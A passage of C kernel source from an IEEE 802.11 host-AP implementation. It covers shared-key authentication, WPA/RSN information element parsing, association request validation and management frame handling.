*/ if (vap->iv_acl != NULL && vap->iv_acl->iac_getpolicy(vap) == IEEE80211_MACCMD_POLICY_RADIUS) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_AUTH | IEEE80211_MSG_ACL, ni->ni_macaddr, "%s", "station authentication defered (radius acl)"); ieee80211_notify_node_auth(ni); return; } break; case IEEE80211_AUTH_SHARED_RESPONSE: if (ni == vap->iv_bss) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key response", "%s", "unknown station"); /* NB: don't send a response */ return; } if (ni->ni_challenge == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key response", "%s", "no challenge recorded"); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } if (memcmp(ni->ni_challenge, &challenge[2], challenge[1]) != 0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key response", "%s", "challenge mismatch"); vap->iv_stats.is_rx_auth_fail++; estatus = IEEE80211_STATUS_CHALLENGE; goto bad; } IEEE80211_NOTE(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_AUTH, ni, "%s", "station authenticated (shared key)"); ieee80211_node_authorize(ni); break; default: IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_AUTH, ni->ni_macaddr, "shared key auth", "bad seq %d", seq); vap->iv_stats.is_rx_bad_auth++; estatus = IEEE80211_STATUS_SEQUENCE; goto bad; } IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, seq + 1); return; bad: /* * Send an error response; but only when operating as an AP. */ /* XXX hack to workaround calling convention */ ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, (seq + 1) | (estatus<<16)); } /* * Convert a WPA cipher selector OUI to an internal * cipher algorithm. Where appropriate we also * record any key length. */ static int wpa_cipher(const uint8_t *sel, uint8_t *keylen) { #define WPA_SEL(x) (((x)<<24)|WPA_OUI) uint32_t w = LE_READ_4(sel); switch (w) { case WPA_SEL(WPA_CSE_NULL): return IEEE80211_CIPHER_NONE; case WPA_SEL(WPA_CSE_WEP40): if (keylen) *keylen = 40 / NBBY; return IEEE80211_CIPHER_WEP; case WPA_SEL(WPA_CSE_WEP104): if (keylen) *keylen = 104 / NBBY; return IEEE80211_CIPHER_WEP; case WPA_SEL(WPA_CSE_TKIP): return IEEE80211_CIPHER_TKIP; case WPA_SEL(WPA_CSE_CCMP): return IEEE80211_CIPHER_AES_CCM; } return 32; /* NB: so 1<< is discarded */ #undef WPA_SEL } /* * Convert a WPA key management/authentication algorithm * to an internal code. */ static int wpa_keymgmt(const uint8_t *sel) { #define WPA_SEL(x) (((x)<<24)|WPA_OUI) uint32_t w = LE_READ_4(sel); switch (w) { case WPA_SEL(WPA_ASE_8021X_UNSPEC): return WPA_ASE_8021X_UNSPEC; case WPA_SEL(WPA_ASE_8021X_PSK): return WPA_ASE_8021X_PSK; case WPA_SEL(WPA_ASE_NONE): return WPA_ASE_NONE; } return 0; /* NB: so is discarded */ #undef WPA_SEL } /* * Parse a WPA information element to collect parameters. * Note that we do not validate security parameters; that * is handled by the authenticator; the parsing done here * is just for internal use in making operational decisions. */ static int ieee80211_parse_wpa(struct ieee80211vap *vap, const uint8_t *frm, struct ieee80211_rsnparms *rsn, const struct ieee80211_frame *wh) { uint8_t len = frm[1]; uint32_t w; int n; /* * Check the length once for fixed parts: OUI, type, * version, mcast cipher, and 2 selector counts. * Other, variable-length data, must be checked separately. 
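wpa_cipher() and wpa_keymgmt() above match 4-byte suite selectors read little-endian, so the 24-bit OUI lands in the low bytes and the suite type in the top byte, which is exactly the shape the (type<<24)|OUI switch cases expect. A standalone sketch of that read:

    #include <stdint.h>
    #include <stdio.h>

    static uint32_t
    read_selector_le(const uint8_t *p)
    {
        return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
            ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    }

    int
    main(void)
    {
        /* WPA OUI 00:50:f2 with suite type 2 (TKIP in the WPA numbering). */
        const uint8_t sel[4] = { 0x00, 0x50, 0xf2, 0x02 };

        printf("selector 0x%08x\n", (unsigned)read_selector_le(sel)); /* 0x02f25000 */
        return 0;
    }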
*/ if ((vap->iv_flags & IEEE80211_F_WPA1) == 0) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "not WPA, flags 0x%x", vap->iv_flags); return IEEE80211_REASON_IE_INVALID; } if (len < 14) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "too short, len %u", len); return IEEE80211_REASON_IE_INVALID; } frm += 6, len -= 4; /* NB: len is payload only */ /* NB: iswpaoui already validated the OUI and type */ w = LE_READ_2(frm); if (w != WPA_VERSION) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "bad version %u", w); return IEEE80211_REASON_IE_INVALID; } frm += 2, len -= 2; memset(rsn, 0, sizeof(*rsn)); /* multicast/group cipher */ rsn->rsn_mcastcipher = wpa_cipher(frm, &rsn->rsn_mcastkeylen); frm += 4, len -= 4; /* unicast ciphers */ n = LE_READ_2(frm); frm += 2, len -= 2; if (len < n*4+2) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "ucast cipher data too short; len %u, n %u", len, n); return IEEE80211_REASON_IE_INVALID; } w = 0; for (; n > 0; n--) { w |= 1<<wpa_cipher(frm, &rsn->rsn_ucastkeylen); frm += 4, len -= 4; } if (w & (1<<IEEE80211_CIPHER_TKIP)) rsn->rsn_ucastcipher = IEEE80211_CIPHER_TKIP; else rsn->rsn_ucastcipher = IEEE80211_CIPHER_AES_CCM; /* key management algorithms */ n = LE_READ_2(frm); frm += 2, len -= 2; if (len < n*4) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "key mgmt alg data too short; len %u, n %u", len, n); return IEEE80211_REASON_IE_INVALID; } w = 0; for (; n > 0; n--) { w |= wpa_keymgmt(frm); frm += 4, len -= 4; } if (w & WPA_ASE_8021X_UNSPEC) rsn->rsn_keymgmt = WPA_ASE_8021X_UNSPEC; else rsn->rsn_keymgmt = WPA_ASE_8021X_PSK; if (len > 2) /* optional capabilities */ rsn->rsn_caps = LE_READ_2(frm); return 0; } /* * Convert an RSN cipher selector OUI to an internal * cipher algorithm. Where appropriate we also * record any key length. */ static int rsn_cipher(const uint8_t *sel, uint8_t *keylen) { #define RSN_SEL(x) (((x)<<24)|RSN_OUI) uint32_t w = LE_READ_4(sel); switch (w) { case RSN_SEL(RSN_CSE_NULL): return IEEE80211_CIPHER_NONE; case RSN_SEL(RSN_CSE_WEP40): if (keylen) *keylen = 40 / NBBY; return IEEE80211_CIPHER_WEP; case RSN_SEL(RSN_CSE_WEP104): if (keylen) *keylen = 104 / NBBY; return IEEE80211_CIPHER_WEP; case RSN_SEL(RSN_CSE_TKIP): return IEEE80211_CIPHER_TKIP; case RSN_SEL(RSN_CSE_CCMP): return IEEE80211_CIPHER_AES_CCM; case RSN_SEL(RSN_CSE_WRAP): return IEEE80211_CIPHER_AES_OCB; } return 32; /* NB: so 1<< is discarded */ #undef WPA_SEL } /* * Convert an RSN key management/authentication algorithm * to an internal code. */ static int rsn_keymgmt(const uint8_t *sel) { #define RSN_SEL(x) (((x)<<24)|RSN_OUI) uint32_t w = LE_READ_4(sel); switch (w) { case RSN_SEL(RSN_ASE_8021X_UNSPEC): return RSN_ASE_8021X_UNSPEC; case RSN_SEL(RSN_ASE_8021X_PSK): return RSN_ASE_8021X_PSK; case RSN_SEL(RSN_ASE_NONE): return RSN_ASE_NONE; } return 0; /* NB: so is discarded */ #undef RSN_SEL } /* * Parse a WPA/RSN information element to collect parameters * and validate the parameters against what has been * configured for the system. */ static int ieee80211_parse_rsn(struct ieee80211vap *vap, const uint8_t *frm, struct ieee80211_rsnparms *rsn, const struct ieee80211_frame *wh) { uint8_t len = frm[1]; uint32_t w; int n; /* * Check the length once for fixed parts: * version, mcast cipher, and 2 selector counts. * Other, variable-length data, must be checked separately.
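The parser above ORs a bit per offered unicast suite into w and then applies a simple preference: take TKIP if the client offered it, otherwise assume AES-CCM. A condensed model of that choice; the cipher codes are local stand-ins for the net80211 IEEE80211_CIPHER_* values.

    #include <stdint.h>

    enum { CIPHER_TKIP = 1, CIPHER_AES_CCM = 3 };  /* illustrative values */

    static int
    pick_ucast_cipher(uint32_t offered_mask)
    {
        /* offered_mask has bit (1 << cipher) set for each suite offered */
        return (offered_mask & (1u << CIPHER_TKIP)) ?
            CIPHER_TKIP : CIPHER_AES_CCM;
    }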
*/ if ((vap->iv_flags & IEEE80211_F_WPA2) == 0) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "WPA", "not RSN, flags 0x%x", vap->iv_flags); return IEEE80211_REASON_IE_INVALID; } if (len < 10) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "RSN", "too short, len %u", len); return IEEE80211_REASON_IE_INVALID; } frm += 2; w = LE_READ_2(frm); if (w != RSN_VERSION) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "RSN", "bad version %u", w); return IEEE80211_REASON_IE_INVALID; } frm += 2, len -= 2; memset(rsn, 0, sizeof(*rsn)); /* multicast/group cipher */ rsn->rsn_mcastcipher = rsn_cipher(frm, &rsn->rsn_mcastkeylen); frm += 4, len -= 4; /* unicast ciphers */ n = LE_READ_2(frm); frm += 2, len -= 2; if (len < n*4+2) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "RSN", "ucast cipher data too short; len %u, n %u", len, n); return IEEE80211_REASON_IE_INVALID; } w = 0; for (; n > 0; n--) { w |= 1<<rsn_cipher(frm, &rsn->rsn_ucastkeylen); frm += 4, len -= 4; } if (w & (1<<IEEE80211_CIPHER_TKIP)) rsn->rsn_ucastcipher = IEEE80211_CIPHER_TKIP; else rsn->rsn_ucastcipher = IEEE80211_CIPHER_AES_CCM; /* key management algorithms */ n = LE_READ_2(frm); frm += 2, len -= 2; if (len < n*4) { IEEE80211_DISCARD_IE(vap, IEEE80211_MSG_ELEMID | IEEE80211_MSG_WPA, wh, "RSN", "key mgmt alg data too short; len %u, n %u", len, n); return IEEE80211_REASON_IE_INVALID; } w = 0; for (; n > 0; n--) { w |= rsn_keymgmt(frm); frm += 4, len -= 4; } if (w & RSN_ASE_8021X_UNSPEC) rsn->rsn_keymgmt = RSN_ASE_8021X_UNSPEC; else rsn->rsn_keymgmt = RSN_ASE_8021X_PSK; /* optional RSN capabilities */ if (len > 2) rsn->rsn_caps = LE_READ_2(frm); /* XXXPMKID */ return 0; } /* * WPA/802.11i assocation request processing. */ static int wpa_assocreq(struct ieee80211_node *ni, struct ieee80211_rsnparms *rsnparms, const struct ieee80211_frame *wh, const uint8_t *wpa, const uint8_t *rsn, uint16_t capinfo) { struct ieee80211vap *vap = ni->ni_vap; uint8_t reason; int badwparsn; ni->ni_flags &= ~(IEEE80211_NODE_WPS|IEEE80211_NODE_TSN); if (wpa == NULL && rsn == NULL) { if (vap->iv_flags_ext & IEEE80211_FEXT_WPS) { /* * W-Fi Protected Setup (WPS) permits * clients to associate and pass EAPOL frames * to establish initial credentials. */ ni->ni_flags |= IEEE80211_NODE_WPS; return 1; } if ((vap->iv_flags_ext & IEEE80211_FEXT_TSN) && (capinfo & IEEE80211_CAPINFO_PRIVACY)) { /* * Transitional Security Network. Permits clients * to associate and use WEP while WPA is configured. */ ni->ni_flags |= IEEE80211_NODE_TSN; return 1; } IEEE80211_DISCARD(vap, IEEE80211_MSG_ASSOC | IEEE80211_MSG_WPA, wh, NULL, "%s", "no WPA/RSN IE in association request"); vap->iv_stats.is_rx_assoc_badwpaie++; reason = IEEE80211_REASON_IE_INVALID; goto bad; } /* assert right association security credentials */ badwparsn = 0; /* NB: to silence compiler */ switch (vap->iv_flags & IEEE80211_F_WPA) { case IEEE80211_F_WPA1: badwparsn = (wpa == NULL); break; case IEEE80211_F_WPA2: badwparsn = (rsn == NULL); break; case IEEE80211_F_WPA1|IEEE80211_F_WPA2: badwparsn = (wpa == NULL && rsn == NULL); break; } if (badwparsn) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ASSOC | IEEE80211_MSG_WPA, wh, NULL, "%s", "missing WPA/RSN IE in association request"); vap->iv_stats.is_rx_assoc_badwpaie++; reason = IEEE80211_REASON_IE_INVALID; goto bad; } /* * Parse WPA/RSN information element.
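wpa_assocreq() above keys the "required IE" test off which of WPA1/WPA2 the vap has enabled. A compact restatement of that rule; the flag values are local stand-ins for the vap WPA flags.

    #include <stdbool.h>

    #define F_WPA1 0x1
    #define F_WPA2 0x2

    static bool
    wpa_ie_missing(unsigned wpa_flags, bool have_wpa_ie, bool have_rsn_ie)
    {
        switch (wpa_flags & (F_WPA1 | F_WPA2)) {
        case F_WPA1:           return !have_wpa_ie;   /* WPA1 only */
        case F_WPA2:           return !have_rsn_ie;   /* WPA2/RSN only */
        case F_WPA1 | F_WPA2:  return !have_wpa_ie && !have_rsn_ie;
        }
        return false;          /* WPA not enabled: nothing required */
    }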
*/ if (wpa != NULL) reason = ieee80211_parse_wpa(vap, wpa, rsnparms, wh); else reason = ieee80211_parse_rsn(vap, rsn, rsnparms, wh); if (reason != 0) { /* XXX distinguish WPA/RSN? */ vap->iv_stats.is_rx_assoc_badwpaie++; goto bad; } IEEE80211_NOTE(vap, IEEE80211_MSG_ASSOC | IEEE80211_MSG_WPA, ni, "%s ie: mc %u/%u uc %u/%u key %u caps 0x%x", wpa != NULL ? "WPA" : "RSN", rsnparms->rsn_mcastcipher, rsnparms->rsn_mcastkeylen, rsnparms->rsn_ucastcipher, rsnparms->rsn_ucastkeylen, rsnparms->rsn_keymgmt, rsnparms->rsn_caps); return 1; bad: ieee80211_node_deauth(ni, reason); return 0; } /* XXX find a better place for definition */ struct l2_update_frame { struct ether_header eh; uint8_t dsap; uint8_t ssap; uint8_t control; uint8_t xid[3]; } __packed; /* * Deliver a TGf L2UF frame on behalf of a station. * This primes any bridge when the station is roaming * between ap's on the same wired network. */ static void ieee80211_deliver_l2uf(struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = vap->iv_ifp; struct mbuf *m; struct l2_update_frame *l2uf; struct ether_header *eh; m = m_gethdr(M_NOWAIT, MT_DATA); if (m == NULL) { IEEE80211_NOTE(vap, IEEE80211_MSG_ASSOC, ni, "%s", "no mbuf for l2uf frame"); vap->iv_stats.is_rx_nobuf++; /* XXX not right */ return; } l2uf = mtod(m, struct l2_update_frame *); eh = &l2uf->eh; /* dst: Broadcast address */ IEEE80211_ADDR_COPY(eh->ether_dhost, ifp->if_broadcastaddr); /* src: associated STA */ IEEE80211_ADDR_COPY(eh->ether_shost, ni->ni_macaddr); eh->ether_type = htons(sizeof(*l2uf) - sizeof(*eh)); l2uf->dsap = 0; l2uf->ssap = 0; l2uf->control = 0xf5; l2uf->xid[0] = 0x81; l2uf->xid[1] = 0x80; l2uf->xid[2] = 0x00; m->m_pkthdr.len = m->m_len = sizeof(*l2uf); hostap_deliver_data(vap, ni, m); } static void ratesetmismatch(struct ieee80211_node *ni, const struct ieee80211_frame *wh, int reassoc, int resp, const char *tag, int rate) { IEEE80211_NOTE_MAC(ni->ni_vap, IEEE80211_MSG_ANY, wh->i_addr2, "deny %s request, %s rate set mismatch, rate/MCS %d", reassoc ? "reassoc" : "assoc", tag, rate & IEEE80211_RATE_VAL); IEEE80211_SEND_MGMT(ni, resp, IEEE80211_STATUS_BASIC_RATE); ieee80211_node_leave(ni); } static void capinfomismatch(struct ieee80211_node *ni, const struct ieee80211_frame *wh, int reassoc, int resp, const char *tag, int capinfo) { struct ieee80211vap *vap = ni->ni_vap; IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ANY, wh->i_addr2, "deny %s request, %s mismatch 0x%x", reassoc ? "reassoc" : "assoc", tag, capinfo); IEEE80211_SEND_MGMT(ni, resp, IEEE80211_STATUS_CAPINFO); ieee80211_node_leave(ni); vap->iv_stats.is_rx_assoc_capmismatch++; } static void htcapmismatch(struct ieee80211_node *ni, const struct ieee80211_frame *wh, int reassoc, int resp) { IEEE80211_NOTE_MAC(ni->ni_vap, IEEE80211_MSG_ANY, wh->i_addr2, "deny %s request, %s missing HT ie", reassoc ?
"reassoc" : "assoc"); /* XXX no better code */ IEEE80211_SEND_MGMT(ni, resp, IEEE80211_STATUS_MISSING_HT_CAPS); ieee80211_node_leave(ni); } static void authalgreject(struct ieee80211_node *ni, const struct ieee80211_frame *wh, int algo, int seq, int status) { struct ieee80211vap *vap = ni->ni_vap; IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, NULL, "unsupported alg %d", algo); vap->iv_stats.is_rx_auth_unsupported++; ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, seq | (status << 16)); } static __inline int ishtmixed(const uint8_t *ie) { const struct ieee80211_ie_htinfo *ht = (const struct ieee80211_ie_htinfo *) ie; return (ht->hi_byte2 & IEEE80211_HTINFO_OPMODE) == IEEE80211_HTINFO_OPMODE_MIXED; } static int is11bclient(const uint8_t *rates, const uint8_t *xrates) { static const uint32_t brates = (1<<2*1)|(1<<2*2)|(1<<11)|(1<<2*11); int i; /* NB: the 11b clients we care about will not have xrates */ if (xrates != NULL || rates == NULL) return 0; for (i = 0; i < rates[1]; i++) { int r = rates[2+i] & IEEE80211_RATE_VAL; if (r > 2*11 || ((1<<r) & brates) == 0) return 0; } return 1; } static void hostap_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m0, int subtype, int rssi, int nf) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; uint8_t *frm, *efrm, *sfrm; uint8_t *ssid, *rates, *xrates, *wpa, *rsn, *wme, *ath, *htcap; int reassoc, resp; uint8_t rate; wh = mtod(m0, struct ieee80211_frame *); frm = (uint8_t *)&wh[1]; efrm = mtod(m0, uint8_t *) + m0->m_len; switch (subtype) { case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: { struct ieee80211_scanparams scan; /* * We process beacon/probe response frames when scanning; * otherwise we check beacon frames for overlapping non-ERP * BSS in 11g and/or overlapping legacy BSS when in HT. */ if ((ic->ic_flags & IEEE80211_F_SCAN) == 0 && subtype == IEEE80211_FC0_SUBTYPE_PROBE_RESP) { vap->iv_stats.is_rx_mgtdiscard++; return; } /* NB: accept off-channel frames */ if (ieee80211_parse_beacon(ni, m0, &scan) &~ IEEE80211_BPARSE_OFFCHAN) return; /* * Count frame now that we know it's to be processed. */ if (subtype == IEEE80211_FC0_SUBTYPE_BEACON) { vap->iv_stats.is_rx_beacon++; /* XXX remove */ IEEE80211_NODE_STAT(ni, rx_beacons); } else IEEE80211_NODE_STAT(ni, rx_proberesp); /* * If scanning, just pass information to the scan module. */ if (ic->ic_flags & IEEE80211_F_SCAN) { if (scan.status == 0 && /* NB: on channel */ (ic->ic_flags_ext & IEEE80211_FEXT_PROBECHAN)) { /* * Actively scanning a channel marked passive; * send a probe request now that we know there * is 802.11 traffic present. * * XXX check if the beacon we recv'd gives * us what we need and suppress the probe req */ ieee80211_probe_curchan(vap, 1); ic->ic_flags_ext &= ~IEEE80211_FEXT_PROBECHAN; } ieee80211_add_scan(vap, &scan, wh, subtype, rssi, nf); return; } /* * Check beacon for overlapping bss w/ non ERP stations. * If we detect one and protection is configured but not * enabled, enable it and start a timer that'll bring us * out if we stop seeing the bss.
*/ if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan) && scan.status == 0 && /* NB: on-channel */ ((scan.erp & 0x100) == 0 || /* NB: no ERP, 11b sta*/ (scan.erp & IEEE80211_ERP_NON_ERP_PRESENT))) { ic->ic_lastnonerp = ticks; ic->ic_flags_ext |= IEEE80211_FEXT_NONERP_PR; if (ic->ic_protmode != IEEE80211_PROT_NONE && (ic->ic_flags & IEEE80211_F_USEPROT) == 0) { IEEE80211_NOTE_FRAME(vap, IEEE80211_MSG_ASSOC, wh, "non-ERP present on channel %d " "(saw erp 0x%x from channel %d), " "enable use of protection", ic->ic_curchan->ic_ieee, scan.erp, scan.chan); ic->ic_flags |= IEEE80211_F_USEPROT; ieee80211_notify_erp(ic); } } /* * Check beacon for non-HT station on HT channel * and update HT BSS occupancy as appropriate. */ if (IEEE80211_IS_CHAN_HT(ic->ic_curchan)) { if (scan.status & IEEE80211_BPARSE_OFFCHAN) { /* * Off control channel; only check frames * that come in the extension channel when * operating w/ HT40. */ if (!IEEE80211_IS_CHAN_HT40(ic->ic_curchan)) break; if (scan.chan != ic->ic_curchan->ic_extieee) break; } if (scan.htinfo == NULL) { ieee80211_htprot_update(ic, IEEE80211_HTINFO_OPMODE_PROTOPT | IEEE80211_HTINFO_NONHT_PRESENT); } else if (ishtmixed(scan.htinfo)) { /* XXX? take NONHT_PRESENT from beacon? */ ieee80211_htprot_update(ic, IEEE80211_HTINFO_OPMODE_MIXED | IEEE80211_HTINFO_NONHT_PRESENT); } } break; } case IEEE80211_FC0_SUBTYPE_PROBE_REQ: if (vap->iv_state != IEEE80211_S_RUN) { vap->iv_stats.is_rx_mgtdiscard++; return; } /* * Consult the ACL policy module if setup. */ if (vap->iv_acl != NULL && !vap->iv_acl->iac_check(vap, wh)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ACL, wh, NULL, "%s", "disallowed by ACL"); vap->iv_stats.is_rx_acl++; return; } /* * prreq frame format * [tlv] ssid * [tlv] supported rates * [tlv] extended supported rates */ ssid = rates = xrates = NULL; sfrm = frm; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_SSID: ssid = frm; break; case IEEE80211_ELEMID_RATES: rates = frm; break; case IEEE80211_ELEMID_XRATES: xrates = frm; break; } frm += frm[1] + 2; } IEEE80211_VERIFY_ELEMENT(rates, IEEE80211_RATE_MAXSIZE, return); if (xrates != NULL) IEEE80211_VERIFY_ELEMENT(xrates, IEEE80211_RATE_MAXSIZE - rates[1], return); IEEE80211_VERIFY_ELEMENT(ssid, IEEE80211_NWID_LEN, return); IEEE80211_VERIFY_SSID(vap->iv_bss, ssid, return); if ((vap->iv_flags & IEEE80211_F_HIDESSID) && ssid[1] == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "no ssid with ssid suppression enabled"); vap->iv_stats.is_rx_ssidmismatch++; /*XXX*/ return; } /* XXX find a better class or define it's own */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr2, "%s", "recv probe req"); /* * Some legacy 11b clients cannot hack a complete * probe response frame. When the request includes * only a bare-bones rate set, communicate this to * the transmit side. */ ieee80211_send_proberesp(vap, wh->i_addr2, is11bclient(rates, xrates) ? 
IEEE80211_SEND_LEGACY_11B : 0); break; case IEEE80211_FC0_SUBTYPE_AUTH: { uint16_t algo, seq, status; if (vap->iv_state != IEEE80211_S_RUN) { vap->iv_stats.is_rx_mgtdiscard++; return; } if (!IEEE80211_ADDR_EQ(wh->i_addr3, vap->iv_bss->ni_bssid)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, NULL, "%s", "wrong bssid"); vap->iv_stats.is_rx_wrongbss++; /*XXX unique stat?*/ return; } /* * auth frame format * [2] algorithm * [2] sequence * [2] status * [tlv*] challenge */ IEEE80211_VERIFY_LENGTH(efrm - frm, 6, return); algo = le16toh(*(uint16_t *)frm); seq = le16toh(*(uint16_t *)(frm + 2)); status = le16toh(*(uint16_t *)(frm + 4)); IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_AUTH, wh->i_addr2, "recv auth frame with algorithm %d seq %d", algo, seq); /* * Consult the ACL policy module if setup. */ if (vap->iv_acl != NULL && !vap->iv_acl->iac_check(vap, wh)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ACL, wh, NULL, "%s", "disallowed by ACL"); vap->iv_stats.is_rx_acl++; ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, (seq+1) | (IEEE80211_STATUS_UNSPECIFIED<<16)); return; } if (vap->iv_flags & IEEE80211_F_COUNTERM) { IEEE80211_DISCARD(vap, IEEE80211_MSG_AUTH | IEEE80211_MSG_CRYPTO, wh, NULL, "%s", "TKIP countermeasures enabled"); vap->iv_stats.is_rx_auth_countermeasures++; ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_AUTH, IEEE80211_REASON_MIC_FAILURE); return; } if (algo == IEEE80211_AUTH_ALG_SHARED) hostap_auth_shared(ni, wh, frm + 6, efrm, rssi, nf, seq, status); else if (algo == IEEE80211_AUTH_ALG_OPEN) hostap_auth_open(ni, wh, rssi, nf, seq, status); else if (algo == IEEE80211_AUTH_ALG_LEAP) { authalgreject(ni, wh, algo, seq+1, IEEE80211_STATUS_ALG); return; } else { /* * We assume that an unknown algorithm is the result * of a decryption failure on a shared key auth frame; * return a status code appropriate for that instead * of IEEE80211_STATUS_ALG. * * NB: a seq# of 4 is intentional; the decrypted * frame likely has a bogus seq value. */ authalgreject(ni, wh, algo, 4, IEEE80211_STATUS_CHALLENGE); return; } break; } case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: { uint16_t capinfo, lintval; struct ieee80211_rsnparms rsnparms; if (vap->iv_state != IEEE80211_S_RUN) { vap->iv_stats.is_rx_mgtdiscard++; return; } if (!IEEE80211_ADDR_EQ(wh->i_addr3, vap->iv_bss->ni_bssid)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, NULL, "%s", "wrong bssid"); vap->iv_stats.is_rx_assoc_bss++; return; } if (subtype == IEEE80211_FC0_SUBTYPE_REASSOC_REQ) { reassoc = 1; resp = IEEE80211_FC0_SUBTYPE_REASSOC_RESP; } else { reassoc = 0; resp = IEEE80211_FC0_SUBTYPE_ASSOC_RESP; } if (ni == vap->iv_bss) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_ANY, wh->i_addr2, "deny %s request, sta not authenticated", reassoc ? "reassoc" : "assoc"); ieee80211_send_error(ni, wh->i_addr2, IEEE80211_FC0_SUBTYPE_DEAUTH, IEEE80211_REASON_ASSOC_NOT_AUTHED); vap->iv_stats.is_rx_assoc_notauth++; return; } /* * asreq frame format * [2] capability information * [2] listen interval * [6*] current AP address (reassoc only) * [tlv] ssid * [tlv] supported rates * [tlv] extended supported rates * [tlv] WPA or RSN * [tlv] HT capabilities * [tlv] Atheros capabilities */ IEEE80211_VERIFY_LENGTH(efrm - frm, (reassoc ? 
10 : 4), return); capinfo = le16toh(*(uint16_t *)frm); frm += 2; lintval = le16toh(*(uint16_t *)frm); frm += 2; if (reassoc) frm += 6; /* ignore current AP info */ ssid = rates = xrates = wpa = rsn = wme = ath = htcap = NULL; sfrm = frm; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_SSID: ssid = frm; break; case IEEE80211_ELEMID_RATES: rates = frm; break; case IEEE80211_ELEMID_XRATES: xrates = frm; break; case IEEE80211_ELEMID_RSN: rsn = frm; break; case IEEE80211_ELEMID_HTCAP: htcap = frm; break; case IEEE80211_ELEMID_VENDOR: if (iswpaoui(frm)) wpa = frm; else if (iswmeinfo(frm)) wme = frm; #ifdef IEEE80211_SUPPORT_SUPERG else if (isatherosoui(frm)) ath = frm; #endif else if (vap->iv_flags_ht & IEEE80211_FHT_HTCOMPAT) { if (ishtcapoui(frm) && htcap == NULL) htcap = frm; } break; } frm += frm[1] + 2; } IEEE80211_VERIFY_ELEMENT(rates, IEEE80211_RATE_MAXSIZE, return); if (xrates != NULL) IEEE80211_VERIFY_ELEMENT(xrates, IEEE80211_RATE_MAXSIZE - rates[1], return); IEEE80211_VERIFY_ELEMENT(ssid, IEEE80211_NWID_LEN, return); IEEE80211_VERIFY_SSID(vap->iv_bss, ssid, return); if (htcap != NULL) { IEEE80211_VERIFY_LENGTH(htcap[1], htcap[0] == IEEE80211_ELEMID_VENDOR ? 4 + sizeof(struct ieee80211_ie_htcap)-2 : sizeof(struct ieee80211_ie_htcap)-2, return); /* XXX just NULL out? */ } if ((vap->iv_flags & IEEE80211_F_WPA) && !wpa_assocreq(ni, &rsnparms, wh, wpa, rsn, capinfo)) return; /* discard challenge after association */ if (ni->ni_challenge != NULL) { free(ni->ni_challenge, M_80211_NODE); ni->ni_challenge = NULL; } /* NB: 802.11 spec says to ignore station's privacy bit */ if ((capinfo & IEEE80211_CAPINFO_ESS) == 0) { capinfomismatch(ni, wh, reassoc, resp, "capability", capinfo); return; } /* * Disallow re-associate w/ invalid slot time setting. */ if (ni->ni_associd != 0 && IEEE80211_IS_CHAN_ANYG(ic->ic_bsschan) && ((ni->ni_capinfo ^ capinfo) & IEEE80211_CAPINFO_SHORT_SLOTTIME)) { capinfomismatch(ni, wh, reassoc, resp, "slot time", capinfo); return; } rate = ieee80211_setup_rates(ni, rates, xrates, IEEE80211_F_DOSORT | IEEE80211_F_DOFRATE | IEEE80211_F_DONEGO | IEEE80211_F_DODEL); if (rate & 